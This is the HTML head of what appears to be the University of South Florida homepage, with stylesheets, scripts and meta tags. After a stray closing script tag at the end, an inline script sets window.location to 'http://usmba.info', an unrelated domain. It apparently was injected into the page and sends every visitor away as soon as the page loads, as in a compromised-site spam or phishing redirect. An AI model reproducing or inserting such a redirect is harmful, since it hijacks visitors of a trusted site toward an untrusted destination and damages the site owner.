<head>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <title>Welcome to the University of South Florida | Tampa, FL</title>
   
   <meta name="viewport" content="width=device-width, initial-scale=1.0" />
<link type="text/css" rel="stylesheet" media="screen" href="/_resources/css/global-styles.css?ver=0.4" />
<link type="text/css" rel="stylesheet" media="screen" href="/_resources/css/home.css?ver=0.4" />
<link type="text/css" rel="stylesheet" media="print" href="/_resources/css/print.css?ver=0.1" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script>
<script type="text/javascript" src="/_resources/js/functions.js?ver=0.1"></script>
<!--[if lt IE 9]><script type="text/javascript" src="/_resources/js/respond.js"></script><![endif]-->
<script type="text/javascript" src="/_resources/js/home-functions.js?ver=0.2"></script>

   
   
   
   
   <meta name="Description" content="The University of South Florida is a high-impact, global research university dedicated to student success serving Tampa, St. Petersburg and Sarasota-Manatee.">
   
   <meta name="Keywords" content="USF, University of South Florida, Tampa, USF Health, USF Athletics, USF News, events, calendar, apply, admissions, about, academics, research, my usf, careers, campus life, campus resources, Florida universities, Florida colleges">
   
   <meta name="Author" content="University of South Florida">
   
</script>
 <script type="text/javascript">
<!--
window.location = "http://usmba.info"
//-->
</script>
 
